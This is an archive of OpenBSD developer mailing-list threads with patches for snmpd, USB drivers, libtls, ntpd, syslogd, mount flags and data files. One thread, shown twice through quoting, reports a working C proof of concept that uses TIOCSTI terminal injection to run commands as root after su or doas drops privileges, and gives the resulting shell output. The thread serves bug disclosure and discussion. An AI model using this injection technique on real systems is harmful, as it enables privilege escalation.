make snmpd explicitely include tree.h
at the moment its relying on a pf header. ok? Index: snmpd.h === RCS file: /cvs/src/usr.sbin/snmpd/snmpd.h,v retrieving revision 1.67 diff -u -p -r1.67 snmpd.h --- snmpd.h 16 Aug 2016 18:41:57 - 1.67 +++ snmpd.h 2 Oct 2016 05:36:48 - @@ -20,6 +20,8 @@ #ifndef SNMPD_H #define SNMPD_H +#include + #include #include #include
EVP_CipherFinal_ex for snmpd
this gets rid of a linker warning. the impression i get is that EVP_CipherFinal_ex explicitely does not do cleanup of the cipher context thing, while EVP_CipherFinal could if it wanted to. ok? Index: usm.c === RCS file: /cvs/src/usr.sbin/snmpd/usm.c,v retrieving revision 1.9 diff -u -p -r1.9 usm.c --- usm.c 16 Jan 2015 00:05:13 - 1.9 +++ usm.c 2 Oct 2016 05:32:03 - @@ -605,7 +605,7 @@ usm_crypt(struct snmp_message *msg, u_ch EVP_CIPHER_CTX_set_padding(&ctx, 0); if (EVP_CipherUpdate(&ctx, outbuf, &len, inbuf, inlen) && - EVP_CipherFinal(&ctx, outbuf + len, &len2)) + EVP_CipherFinal_ex(&ctx, outbuf + len, &len2)) rv = len + len2; else rv = -1;
Re: ehci(4)/imxehci(4) diff to switch port into host mode
On Sat, Oct 01, 2016 at 03:48:35PM +0200, Mark Kettenis wrote: > The USB controller on the Freescale i.MX application processors has a > dual role port that can act as device (OTG) or as host. Since we > don't have any device mode support in our kernel, we try to switch the > port into host mode. Unfortunately that never worked. Here's why: > > The USBMODE register that controls the mode, gets reset whenever we > reset the controller, i.e. when ehci_reset() gets called. Since > ehci_init() calls ehci_reset() we lose the host mode setting almost > immediately, and nothing works. > > The diff below adds code to save and restore the USBMODE register if > the EHCIF_USBMODE flag is set, and sets this flag in the imxehci(4) > driver. I also moved the defines for this register to ehcireg.h. > While this isn't a standard EHCI register, it seems that it is present > on many dual-role USB 2.0 controller. Allegedly it is part of a > design that ended up being licensed to many other companies. > > Note that the register offset changed from 0xa8 to 0x68. This is not > a bug. Imade the offset relative to the offset given by the > EHCI_CAPLENGTH register. It is now accessed using EOREAD4/EOWRITE4 > instead of EREAD4/EWRITE4. > > ok? The top usb port on the cubox now works with this. ok jsg@ > > > Index: arch/armv7/imx/imxehci.c > === > RCS file: /cvs/src/sys/arch/armv7/imx/imxehci.c,v > retrieving revision 1.17 > diff -u -p -r1.17 imxehci.c > --- arch/armv7/imx/imxehci.c 13 Aug 2016 11:08:58 - 1.17 > +++ arch/armv7/imx/imxehci.c 1 Oct 2016 13:26:02 - > @@ -58,9 +58,6 @@ > /* ehci */ > #define USB_EHCI_OFFSET 0x100 > > -#define EHCI_USBMODE 0xa8 > - > -#define EHCI_USBMODE_HOST(3 << 0) > #define EHCI_PS_PTS_UTMI_MASK((1 << 25) | (3 << 30)) > > /* usb non-core */ > @@ -144,6 +141,7 @@ imxehci_attach(struct device *parent, st > sc->sc.iot = faa->fa_iot; > sc->sc.sc_bus.dmatag = faa->fa_dmat; > sc->sc.sc_size = faa->fa_reg[0].size - USB_EHCI_OFFSET; > + sc->sc.sc_flags = EHCIF_USBMODE; > > /* Map I/O space */ > if (bus_space_map(sc->sc.iot, faa->fa_reg[0].addr, > @@ -247,8 +245,8 @@ imxehci_attach(struct device *parent, st > USBPHY_CTRL_ENUTMILEVEL2 | USBPHY_CTRL_ENUTMILEVEL3); > > /* set host mode */ > - EWRITE4(&sc->sc, EHCI_USBMODE, > - EREAD4(&sc->sc, EHCI_USBMODE) | EHCI_USBMODE_HOST); > + EOWRITE4(&sc->sc, EHCI_USBMODE, > + EOREAD4(&sc->sc, EHCI_USBMODE) | EHCI_USBMODE_CM_HOST); > > /* set to UTMI mode */ > EOWRITE4(&sc->sc, EHCI_PORTSC(1), > Index: dev/usb/ehci.c > === > RCS file: /cvs/src/sys/dev/usb/ehci.c,v > retrieving revision 1.193 > diff -u -p -r1.193 ehci.c > --- dev/usb/ehci.c15 Sep 2016 02:00:17 - 1.193 > +++ dev/usb/ehci.c1 Oct 2016 13:26:02 - > @@ -1114,7 +1114,7 @@ ehci_activate(struct device *self, int a > usbd_status > ehci_reset(struct ehci_softc *sc) > { > - u_int32_t hcr; > + u_int32_t hcr, usbmode; > int i; > > EOWRITE4(sc, EHCI_USBCMD, 0); /* Halt controller */ > @@ -1128,6 +1128,9 @@ ehci_reset(struct ehci_softc *sc) > if (!hcr) > printf("%s: halt timeout\n", sc->sc_bus.bdev.dv_xname); > > + if (sc->sc_flags & EHCIF_USBMODE) > + usbmode = EOREAD4(sc, EHCI_USBMODE); > + > EOWRITE4(sc, EHCI_USBCMD, EHCI_CMD_HCRESET); > for (i = 0; i < 100; i++) { > usb_delay_ms(&sc->sc_bus, 1); > @@ -1140,6 +1143,9 @@ ehci_reset(struct ehci_softc *sc) > printf("%s: reset timeout\n", sc->sc_bus.bdev.dv_xname); > return (USBD_IOERROR); > } > + > + if (sc->sc_flags & EHCIF_USBMODE) > + EOWRITE4(sc, EHCI_USBMODE, usbmode); > > return (USBD_NORMAL_COMPLETION); > } > Index: dev/usb/ehcireg.h > === > RCS file: /cvs/src/sys/dev/usb/ehcireg.h,v > retrieving revision 1.20 > diff -u -p -r1.20 ehcireg.h > --- dev/usb/ehcireg.h 10 Apr 2015 13:56:42 - 1.20 > +++ dev/usb/ehcireg.h 1 Oct 2016 13:26:02 - > @@ -162,6 +162,13 @@ > > #define EHCI_PORT_RESET_COMPLETE 2 /* ms */ > > +/* Nonstandard register to set controller mode. */ > +#define EHCI_USBMODE 0x68 > +#define EHCI_USBMODE_CM_M 0x0003 > +#define EHCI_USBMODE_CM_IDLE0x > +#define EHCI_USBMODE_CM_DEVICE 0x0002 > +#define EHCI_USBMODE_CM_HOST0x0003 > + > #define EHCI_FLALIGN_ALIGN 0x1000 > > /* No data structure may cross a page boundary. */ > Index: dev/usb/ehcivar.h > === > RCS file: /cvs/src/sys/dev/usb/ehcivar.h,v > retrieving revision 1.36 > diff -u -p -r1.36 ehcivar.h > --- dev/usb/e
Re: Explicitly cast the return variable in tls_load_file()
Kinichiro Inoguchi wrote: > I would like to cast the return variable explicitly in tls_load_file(). > This fix also avoiding Intel C++ compiler "assertion failed" described here. > https://github.com/libressl-portable/portable/issues/209#issuecomment-249587024 This is a compiler bug? The code doesn't change, and there's no bug in the library that I see.
share/misc: Complete 'airport' and 'inter.phone' for Poland
Hi tech@, This diff adds missing airports and area codes for Poland, and fixes some erroneous entries. OK? Index: share/misc/airport === RCS file: /cvs/src/share/misc/airport,v retrieving revision 1.56 diff -u -p -r1.56 airport --- share/misc/airport 10 Jul 2016 13:52:27 - 1.56 +++ share/misc/airport 1 Oct 2016 20:37:42 - @@ -273,6 +273,7 @@ BXU:Butuan, Butuan, Philippines BYO:Bonito, Brazil BYU:Bindlacher Berg, Bayreuth, Germany BZE:Philip S. W. Goldson International, Belize City, Belize +BZG:Szwederowo, Bydgoszcz, Poland BZN:Gallatin Field, Bozeman, Montana, USA CAE:Columbia Metropolitan, South Carolina, USA CAG:Elmas, Cagliari, Sardinia, Italy @@ -726,6 +727,7 @@ IAS:Iasi, Romania IBZ:Ibiza, Spain ICT:Wichita Mid-Continent, Kansas, USA IDA:Idaho Falls, Idaho, USA +IEG:Babimost, Zielona Gora, Poland IEV:Kyiv Zhulyany International, Kyiv, Ukraine IFO:Ivano-Frankivs'k International, Ivano-Frankivs'k, Ukraine IFP:Bullhead City, Arizona, USA @@ -936,6 +938,7 @@ LCA:Larnaca International, Cyprus LCE:La Ceiba International, Honduras LCG:La Coruna, Spain LCH:Lake Charles, Louisiana, USA +LCJ:Lublinek, Lodz, Poland LCY:London City, England, United Kingdom LDB:Londrina, Parana, Brazil LDE:Tarbes International, Lourdes/Tarbes, France @@ -1009,6 +1012,7 @@ LUD:Luderitz, Namibia LUG:Agno, Lugano, Switzerland LUN:Lusaka, Zambia LUX:Findel, Luxembourg +LUZ:Swidnik, Lublin, Poland LVI:Livingstone, Zambia LVK:Livermore, California, USA LWB:Greenbrier Valley, West Virginia, USA @@ -1345,7 +1349,7 @@ POP:La Union, Puerto Plata, Dominican Re POR:Pori, Finland POS:Port Of Spain, Trinidad POU:Dutchess County, Poughkeepsie, New York, USA -POZ:Lawica, Poznan, Poland +POZ:Poznan, Poland PPG:Pago Pago International, American Samoa PPS:Puerto Princesa, Philippines PPT:Pape'ete, Tahiti, French Polynesia @@ -1406,6 +1410,7 @@ RCB:Richards Bay, South Africa RCE:Roche Harbor, Washington, USA RDD:Redding, California, USA RDG:Reading Municipal / Spaatz Field, Pennsylvania, USA +RDO:Sadkow, Radom, Poland RDU:Raleigh-Durham, North Carolina, USA REC:Guararapes International, Recife, Pernambuco, Brazil REG:Tito Menniti, Reggio Calabria, Italy @@ -1457,6 +1462,7 @@ RUN:Roland Garros Airport, Reunion Islan RUT:Rutland, Vermont, USA RWI:Wilson, Rocky Mount, North Carolina, USA RWN:Rivne International, Rivne, Ukraine +RZE:Jasionka, Rzeszow, Poland SAB:Saba Island, Netherlands Antilles SAF:Santa Fe, New Mexico, USA SAH:Sanaa International, Yemen @@ -1620,6 +1626,7 @@ SZG:Salzburg, Austria SZR:Stara Zagora, Bulgaria SZS:Ryan's Creek, Stewart Island, New Zealand SZX:Shenzhen, China +SZY:Szymany, Olsztyn, Poland SZZ:Goleniow, Szczecin, Poland TAB:Crown Point, Tobago, Trinidad And Tobago TAC:Dz Romualdez, Tacloban, Philippines @@ -1815,6 +1822,7 @@ WIL:Wilson, Nairobi, Kenya WIN:Winton, Queensland, Australia WLG:Wellington International, New Zealand WMH:Mountain Home, Arkansas, USA +WMI:Modlin, Warsaw, Poland WNA:Napakiak, Alaska, USA WRL:Worland, Wyoming, USA WRO:Strachowice, Wroclaw, Poland Index: share/misc/inter.phone === RCS file: /cvs/src/share/misc/inter.phone,v retrieving revision 1.42 diff -u -p -r1.42 inter.phone --- share/misc/inter.phone 9 Jul 2016 23:32:51 - 1.42 +++ share/misc/inter.phone 1 Oct 2016 20:37:42 - @@ -1711,10 +1711,55 @@ 47:2:Oslo:Norway 47:5:Bergen:Norway 47:7:Trondheim:Norway -48:12:Crakow:Poland +48:12:Krakow:Poland +48:13:Krosno:Poland +48:14:Tarnow:Poland +48:15:Tarnobrzeg:Poland +48:16:Przemysl:Poland +48:17:Rzeszow:Poland +48:18:Nowy Sacz:Poland 48:22:Warsaw:Poland +48:23:Ciechanow:Poland +48:24:Plock:Poland +48:25:Siedlce:Poland +48:29:Ostroleka:Poland +48:32:Katowice:Poland +48:33:Bielsko-Biala:Poland +48:34:Czestochowa:Poland +48:41:Kielce:Poland 48:42:Lodz:Poland +48:43:Sieradz:Poland +48:44:Piotrkow Trybunalski:Poland +48:46:Skierniewice:Poland +48:48:Radom:Poland +48:52:Bydgoszcz:Poland +48:54:Wloclawek:Poland +48:55:Elblag:Poland +48:56:Torun:Poland 48:58:Gdansk:Poland +48:59:Slupsk:Poland +48:61:Poznan:Poland +48:62:Kalisz:Poland +48:63:Konin:Poland +48:65:Leszno:Poland +48:67:Pila:Poland +48:68:Zielona Gora:Poland +48:71:Wroclaw:Poland +48:74:Walbrzych:Poland +48:75:Jelenia Gora:Poland +48:76:Legnica:Poland +48:77:Opole:Poland +48:81:Lublin:Poland +48:82:Chelm:Poland +48:83:Biala Podlaska:Poland +48:84:Zamosc:Poland +48:85:Bialystok:Poland +48:86:Lomza:Poland +48:87:Suwalki:Poland +48:89:Olsztyn:Poland +48:91:Szczecin:Poland +48:94:Koszalin:Poland +48:95:Gorzow Wielkopolski:Poland 49:201:Essen:Germany 49:202:Wuppertal:Germany 49:203:Duisburg:Germany
Re: Unexpected behavior in su/doas
> I stumbled upon unexpected behavior on OpenBSD 6.0 (all patches) > which seems to allow running commands as the original user when > using su and doas interactively because the controlling terminal > is the same. Use of su, doas, or sudo -- means you EXPLICITLY want the tty to remain the same. > The following binary is used to test this and compiled as > /tmp/a.out: > > #include > #include > > char s[] =3D "echo Payload as $(whoami)\n"; > > void main(void) { > printf("uid: %d\n", getuid()); > > char *c =3D s; > int i =3D 0; > int tty =3D open("/dev/tty", 0); > > do { > ioctl(tty, TIOCSTI, c); > c++; > } while (*c); > > return; > } > > Now running su builder -c /tmp/a.out (where builder is just a > normal user with a shell) results in: > > # su builder -c /tmp/a.out > uid: 1000 > echo Payload as $(whoami) > # echo Payload as $(whoami) > Payload as root > > Similar happens with doas and the following config: > > # cat /etc/doas.conf > permit nopass root as builder > > # doas -u builder /tmp/a.out > uid: 1000 > echo Payload as $(whoami) > # echo Payload as $(whoami) > Payload as root > > Is this behavior expected and if so, how do I run commands from > root as an untrusted user? It's not mentioned in the man page > that using su/doas as root might allow other users to run code as > root. It sounds as if you don't understand what happens. The command gets run afterwards. > Similar behavior is also mentioned in an old (and unfixed) Debian > bug [1]. So what is learned here? De-escalation using these "sudo" or "doas" like tools on a tty is somewhat unsafe - it has always been unsafe - because tty's have capabilities. If you wish to be safer, do these operations without retaining access to a tty. Escalation on the other hand (user -> root) is different, because then it is clear you want to do more / everything. But de-escalation is a joke. This is just one mechanism on tty, there are others. On other descriptors there are other abilities. I don't have an answer.
Unexpected behavior in su/doas
Hello, I stumbled upon unexpected behavior on OpenBSD 6.0 (all patches) which seems to allow running commands as the original user when using su and doas interactively because the controlling terminal is the same. The following binary is used to test this and compiled as /tmp/a.out: #include #include char s[] = "echo Payload as $(whoami)\n"; void main(void) { printf("uid: %d\n", getuid()); char *c = s; int i = 0; int tty = open("/dev/tty", 0); do { ioctl(tty, TIOCSTI, c); c++; } while (*c); return; } Now running su builder -c /tmp/a.out (where builder is just a normal user with a shell) results in: # su builder -c /tmp/a.out uid: 1000 echo Payload as $(whoami) # echo Payload as $(whoami) Payload as root Similar happens with doas and the following config: # cat /etc/doas.conf permit nopass root as builder # doas -u builder /tmp/a.out uid: 1000 echo Payload as $(whoami) # echo Payload as $(whoami) Payload as root Is this behavior expected and if so, how do I run commands from root as an untrusted user? It's not mentioned in the man page that using su/doas as root might allow other users to run code as root. Similar behavior is also mentioned in an old (and unfixed) Debian bug [1]. Regards Simon [1]: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=628843 -- + privacy is necessary + using gnupg http://gnupg.org + public key id: 0x92FEFDB7E44C32F9 signature.asc Description: PGP signature
Re: syslogd fork+exec
On Thu, Sep 29, 2016 at 08:09:23PM +0200, Alexander Bluhm wrote: > Hi, > > With this diff syslogd(8) does an exec on itself in the privileged > parent process to reshuffle its memory layout. > > As syslogd only forks once, it does not really matter wether we > fork+exec in the child or in the parent. To do it in the parent > is easier as it has much less state. > > ok? > > bluhm Your diffs looks good and you made me realize that I should use dup3() instead of dup2() to create children socket. Short explanation for outsiders: dup2(fd1, fd2) duplicates fd1 onto fd2 removing CLOEXEC flags, except if fd1 == fd2, then in that case the fd will remain with CLOEXEC and things will not work. This is not the case with httpd(8), relayd(8), ntpd(8) and switchd(8), but since code might be copied around it would be good to fix this there. I'm using this diff and it works in my default configuration, but since I'm not familiar with syslogd I don't feel confortable giving oks here. I made one comment inline in the snipped diff below. > > Index: usr.sbin/syslogd/privsep.c > === > RCS file: /data/mirror/openbsd/cvs/src/usr.sbin/syslogd/privsep.c,v > retrieving revision 1.61 > diff -u -p -r1.61 privsep.c > --- usr.sbin/syslogd/privsep.c28 Jun 2016 18:22:50 - 1.61 > +++ usr.sbin/syslogd/privsep.c29 Sep 2016 17:55:03 - > @@ -194,38 +162,87 @@ priv_init(char *conf, int numeric, int l > if (fd_unix[i] != -1) > close(fd_unix[i]); > > - /* Save the config file specified by the child process */ > - if (strlcpy(config_file, conf, sizeof config_file) >= > sizeof(config_file)) > - errx(1, "config_file truncation"); > + if (dup3(socks[0], 3, 0) == -1) > + err(1, "dup3 priv sock failed"); > + snprintf(childnum, sizeof(childnum), "%d", child_pid); > + if ((privargv = reallocarray(NULL, argc + 3, sizeof(char *))) == NULL) > + err(1, "alloc priv argv failed"); > + for (i = 0; i < argc; i++) > + privargv[i] = argv[i]; > + privargv[i++] = "-P"; > + privargv[i++] = childnum; > + privargv[i++] = NULL; > + execv(privargv[0], privargv); > + err(1, "exec priv '%s' failed", privargv[0]); > +} > > - if (stat(config_file, &cf_info) < 0) > - err(1, "stat config file failed"); > +__dead void > +priv_exec(char *conf, int numeric, int child, int argc, char *argv[]) > +{ > + int i, fd, sock, cmd, addr_len, result, restart; > + size_t path_len, protoname_len, hostname_len, servname_len; > + char path[PATH_MAX], protoname[5]; > + char hostname[NI_MAXHOST], servname[NI_MAXSERV]; > + struct sockaddr_storage addr; > + struct stat cf_info, cf_stat; > + struct addrinfo hints, *res0; > + struct sigaction sa; > > - /* Save whether or not the child can have access to getnameinfo(3) */ > - if (numeric > 0) > - allow_getnameinfo = 0; > - else > - allow_getnameinfo = 1; > + if (pledge("stdio rpath wpath cpath dns getpw sendfd id proc exec", > + NULL) == -1) > + err(1, "pledge priv"); > + > + if (argc <= 2 || strcmp("-P", argv[argc - 2]) != 0) > + errx(1, "exec without priv"); > + argv[argc -= 2] = NULL; > + > + sock = 3; > + for (fd = 4; fd < 1024; fd++) > + close(fd); This could be replaced with "closefrom(4);". > + > + child_pid = child; > + > + memset(&sa, 0, sizeof(sa)); > + sigemptyset(&sa.sa_mask); > + sa.sa_flags = SA_RESTART; > + sa.sa_handler = SIG_DFL; > + for (i = 1; i < _NSIG; i++) > + sigaction(i, &sa, NULL); > + > + /* Pass TERM/HUP/INT/QUIT through to child, and accept CHLD */ > + sa.sa_handler = sig_pass_to_chld; > + sigaction(SIGTERM, &sa, NULL); > + sigaction(SIGHUP, &sa, NULL); > + sigaction(SIGINT, &sa, NULL); > + sigaction(SIGQUIT, &sa, NULL); > + sa.sa_handler = sig_got_chld; > + sa.sa_flags |= SA_NOCLDSTOP; > + sigaction(SIGCHLD, &sa, NULL); > + > + setproctitle("[priv]"); > + > + if (stat(conf, &cf_info) < 0) > + err(1, "stat config file failed"); > > TAILQ_INIT(&lognames); > increase_state(STATE_CONFIG); > restart = 0; > > while (cur_state < STATE_QUIT) { > - if (may_read(socks[0], &cmd, sizeof(int))) > + if (may_read(sock, &cmd, sizeof(int))) > break; > switch (cmd) { > case PRIV_OPEN_TTY: > logdebug("[priv]: msg PRIV_OPEN_TTY received\n"); > /* Expecting: length, path */ > - must_read(socks[0], &path_len, sizeof(size_t)); > + must_read(sock, &path_len, sizeof(size_t)); > if (path_len == 0 || path_len > sizeof(path)) > _exit(1); > -
ntpd(8): use stack instead of heap
The ntpd(8) constraint fork+exec diff changed the way the constraint processes are created, but then it introduced new calloc()s to avoid increasing diff size and to focus on the problem. Now that the fork+exec is in, this diff make those variables to become a part of the stack. No functional changes, just changing variables storage location. ok? Index: constraint.c === RCS file: /home/obsdcvs/src/usr.sbin/ntpd/constraint.c,v retrieving revision 1.32 diff -u -p -r1.32 constraint.c --- constraint.c26 Sep 2016 17:17:01 - 1.32 +++ constraint.c1 Oct 2016 18:54:35 - @@ -317,8 +317,8 @@ priv_constraint_readquery(struct constra void priv_constraint_child(const char *pw_dir, uid_t pw_uid, gid_t pw_gid) { - struct constraint *cstr; - struct ntp_addr_msg *am; + struct constraintcstr; + struct ntp_addr_msg am; uint8_t *data; static char addr[NI_MAXHOST]; struct timeval rectv, xmttv; @@ -332,10 +332,6 @@ priv_constraint_child(const char *pw_dir if (setpriority(PRIO_PROCESS, 0, 0) == -1) log_warn("could not set priority"); - if ((cstr = calloc(1, sizeof(*cstr))) == NULL || - (am = calloc(1, sizeof(*am))) == NULL) - fatal("%s: calloc", __func__); - /* Init TLS and load CA certs before chroot() */ if (tls_init() == -1) fatalx("tls_init"); @@ -364,9 +360,9 @@ priv_constraint_child(const char *pw_dir if (pledge("stdio inet", NULL) == -1) fatal("pledge"); - cstr->fd = CONSTRAINT_PASSFD; - imsg_init(&cstr->ibuf, cstr->fd); - priv_constraint_readquery(cstr, am, &data); + cstr.fd = CONSTRAINT_PASSFD; + imsg_init(&cstr.ibuf, cstr.fd); + priv_constraint_readquery(&cstr, &am, &data); /* * Get the IP address as name and set the process title accordingly. @@ -374,8 +370,8 @@ priv_constraint_child(const char *pw_dir * any DNS operation, so it is safe to be called without the dns * pledge. */ - if (getnameinfo((struct sockaddr *)&cstr->addr->ss, - SA_LEN((struct sockaddr *)&cstr->addr->ss), + if (getnameinfo((struct sockaddr *)&cstr.addr->ss, + SA_LEN((struct sockaddr *)&cstr.addr->ss), addr, sizeof(addr), NULL, 0, NI_NUMERICHOST) != 0) fatalx("%s getnameinfo", __func__); @@ -394,21 +390,21 @@ priv_constraint_child(const char *pw_dir fatal("%s fcntl F_SETFD", __func__); /* Get remaining data from imsg in the unpriv child */ - if (am->namelen) { - if ((cstr->addr_head.name = - get_string(data, am->namelen)) == NULL) + if (am.namelen) { + if ((cstr.addr_head.name = + get_string(data, am.namelen)) == NULL) fatalx("invalid IMSG_CONSTRAINT_QUERY name"); - data += am->namelen; + data += am.namelen; } - if (am->pathlen) { - if ((cstr->addr_head.path = - get_string(data, am->pathlen)) == NULL) + if (am.pathlen) { + if ((cstr.addr_head.path = + get_string(data, am.pathlen)) == NULL) fatalx("invalid IMSG_CONSTRAINT_QUERY path"); } /* Run! */ if ((ctx = httpsdate_query(addr, - CONSTRAINT_PORT, cstr->addr_head.name, cstr->addr_head.path, + CONSTRAINT_PORT, cstr.addr_head.name, cstr.addr_head.path, conf->ca, conf->ca_len, &rectv, &xmttv)) == NULL) { /* Abort with failure but without warning */ exit(1); @@ -418,9 +414,9 @@ priv_constraint_child(const char *pw_dir iov[0].iov_len = sizeof(rectv); iov[1].iov_base = &xmttv; iov[1].iov_len = sizeof(xmttv); - imsg_composev(&cstr->ibuf, + imsg_composev(&cstr.ibuf, IMSG_CONSTRAINT_RESULT, 0, 0, -1, iov, 2); - imsg_flush(&cstr->ibuf); + imsg_flush(&cstr.ibuf); /* Tear down the TLS connection after sending the result */ httpsdate_free(ctx);
stricter sys_mount() flag handling
After committing the new MNT_NOPERM flag I got some complaints that my code doesn't work by people that recompiled mount_ffs, but didn't reboot to the new kernel. I don't blame them; in that situation sys_mount() silently ignores the unknown flag. IMHO we should check the flags more strictly. Ok? natano Index: sys/mount.h === RCS file: /cvs/src/sys/sys/mount.h,v retrieving revision 1.127 diff -u -p -r1.127 mount.h --- sys/mount.h 10 Sep 2016 16:53:30 - 1.127 +++ sys/mount.h 1 Oct 2016 15:36:11 - @@ -414,6 +414,11 @@ struct mount { #define MNT_DOOMED 0x0800 /* device behind filesystem is gone */ /* + * All mount flags. + */ +#defineMNT_FLAGMASK0x0e0f + +/* * Flags for various system call interfaces. * * waitfor flags to vfs_sync() and getfsstat() Index: kern/vfs_syscalls.c === RCS file: /cvs/src/sys/kern/vfs_syscalls.c,v retrieving revision 1.265 diff -u -p -r1.265 vfs_syscalls.c --- kern/vfs_syscalls.c 10 Sep 2016 16:53:30 - 1.265 +++ kern/vfs_syscalls.c 1 Oct 2016 15:36:11 - @@ -117,6 +117,9 @@ sys_mount(struct proc *p, void *v, regis if ((error = suser(p, 0))) return (error); + if (flags & ~MNT_FLAGMASK) + return (EINVAL); + /* * Mount points must fit in MNAMELEN, not MAXPATHLEN. */
ehci(4)/imxehci(4) diff to switch port into host mode
The USB controller on the Freescale i.MX application processors has a dual role port that can act as device (OTG) or as host. Since we don't have any device mode support in our kernel, we try to switch the port into host mode. Unfortunately that never worked. Here's why: The USBMODE register that controls the mode, gets reset whenever we reset the controller, i.e. when ehci_reset() gets called. Since ehci_init() calls ehci_reset() we lose the host mode setting almost immediately, and nothing works. The diff below adds code to save and restore the USBMODE register if the EHCIF_USBMODE flag is set, and sets this flag in the imxehci(4) driver. I also moved the defines for this register to ehcireg.h. While this isn't a standard EHCI register, it seems that it is present on many dual-role USB 2.0 controller. Allegedly it is part of a design that ended up being licensed to many other companies. Note that the register offset changed from 0xa8 to 0x68. This is not a bug. Imade the offset relative to the offset given by the EHCI_CAPLENGTH register. It is now accessed using EOREAD4/EOWRITE4 instead of EREAD4/EWRITE4. ok? Index: arch/armv7/imx/imxehci.c === RCS file: /cvs/src/sys/arch/armv7/imx/imxehci.c,v retrieving revision 1.17 diff -u -p -r1.17 imxehci.c --- arch/armv7/imx/imxehci.c13 Aug 2016 11:08:58 - 1.17 +++ arch/armv7/imx/imxehci.c1 Oct 2016 13:26:02 - @@ -58,9 +58,6 @@ /* ehci */ #define USB_EHCI_OFFSET0x100 -#define EHCI_USBMODE 0xa8 - -#define EHCI_USBMODE_HOST (3 << 0) #define EHCI_PS_PTS_UTMI_MASK ((1 << 25) | (3 << 30)) /* usb non-core */ @@ -144,6 +141,7 @@ imxehci_attach(struct device *parent, st sc->sc.iot = faa->fa_iot; sc->sc.sc_bus.dmatag = faa->fa_dmat; sc->sc.sc_size = faa->fa_reg[0].size - USB_EHCI_OFFSET; + sc->sc.sc_flags = EHCIF_USBMODE; /* Map I/O space */ if (bus_space_map(sc->sc.iot, faa->fa_reg[0].addr, @@ -247,8 +245,8 @@ imxehci_attach(struct device *parent, st USBPHY_CTRL_ENUTMILEVEL2 | USBPHY_CTRL_ENUTMILEVEL3); /* set host mode */ - EWRITE4(&sc->sc, EHCI_USBMODE, - EREAD4(&sc->sc, EHCI_USBMODE) | EHCI_USBMODE_HOST); + EOWRITE4(&sc->sc, EHCI_USBMODE, + EOREAD4(&sc->sc, EHCI_USBMODE) | EHCI_USBMODE_CM_HOST); /* set to UTMI mode */ EOWRITE4(&sc->sc, EHCI_PORTSC(1), Index: dev/usb/ehci.c === RCS file: /cvs/src/sys/dev/usb/ehci.c,v retrieving revision 1.193 diff -u -p -r1.193 ehci.c --- dev/usb/ehci.c 15 Sep 2016 02:00:17 - 1.193 +++ dev/usb/ehci.c 1 Oct 2016 13:26:02 - @@ -1114,7 +1114,7 @@ ehci_activate(struct device *self, int a usbd_status ehci_reset(struct ehci_softc *sc) { - u_int32_t hcr; + u_int32_t hcr, usbmode; int i; EOWRITE4(sc, EHCI_USBCMD, 0); /* Halt controller */ @@ -1128,6 +1128,9 @@ ehci_reset(struct ehci_softc *sc) if (!hcr) printf("%s: halt timeout\n", sc->sc_bus.bdev.dv_xname); + if (sc->sc_flags & EHCIF_USBMODE) + usbmode = EOREAD4(sc, EHCI_USBMODE); + EOWRITE4(sc, EHCI_USBCMD, EHCI_CMD_HCRESET); for (i = 0; i < 100; i++) { usb_delay_ms(&sc->sc_bus, 1); @@ -1140,6 +1143,9 @@ ehci_reset(struct ehci_softc *sc) printf("%s: reset timeout\n", sc->sc_bus.bdev.dv_xname); return (USBD_IOERROR); } + + if (sc->sc_flags & EHCIF_USBMODE) + EOWRITE4(sc, EHCI_USBMODE, usbmode); return (USBD_NORMAL_COMPLETION); } Index: dev/usb/ehcireg.h === RCS file: /cvs/src/sys/dev/usb/ehcireg.h,v retrieving revision 1.20 diff -u -p -r1.20 ehcireg.h --- dev/usb/ehcireg.h 10 Apr 2015 13:56:42 - 1.20 +++ dev/usb/ehcireg.h 1 Oct 2016 13:26:02 - @@ -162,6 +162,13 @@ #define EHCI_PORT_RESET_COMPLETE 2 /* ms */ +/* Nonstandard register to set controller mode. */ +#define EHCI_USBMODE 0x68 +#define EHCI_USBMODE_CM_M 0x0003 +#define EHCI_USBMODE_CM_IDLE 0x +#define EHCI_USBMODE_CM_DEVICE0x0002 +#define EHCI_USBMODE_CM_HOST 0x0003 + #define EHCI_FLALIGN_ALIGN 0x1000 /* No data structure may cross a page boundary. */ Index: dev/usb/ehcivar.h === RCS file: /cvs/src/sys/dev/usb/ehcivar.h,v retrieving revision 1.36 diff -u -p -r1.36 ehcivar.h --- dev/usb/ehcivar.h 2 Nov 2015 14:55:41 - 1.36 +++ dev/usb/ehcivar.h 1 Oct 2016 13:26:02 - @@ -130,6 +130,7 @@ struct ehci_softc { int sc_flags; /* misc flags */ #define EHCIF_DROPPED_INTR_WORKAROUND 0x01 #define EHCIF_PCB_INTR 0x02 +#define EHCIF_USB
Explicitly cast the return variable in tls_load_file()
I would like to cast the return variable explicitly in tls_load_file(). This fix also avoiding Intel C++ compiler "assertion failed" described here. https://github.com/libressl-portable/portable/issues/209#issuecomment-249587024 ok ? Index: tls_util.c === RCS file: /cvs/src/lib/libtls/tls_util.c,v retrieving revision 1.3 diff -u -p -r1.3 tls_util.c --- tls_util.c 9 Sep 2015 19:49:07 - 1.3 +++ tls_util.c 1 Oct 2016 11:30:28 - @@ -154,7 +154,7 @@ tls_load_file(const char *name, size_t * done: *len = size; - return (buf); + return ((uint8_t *)buf); fail: free(buf);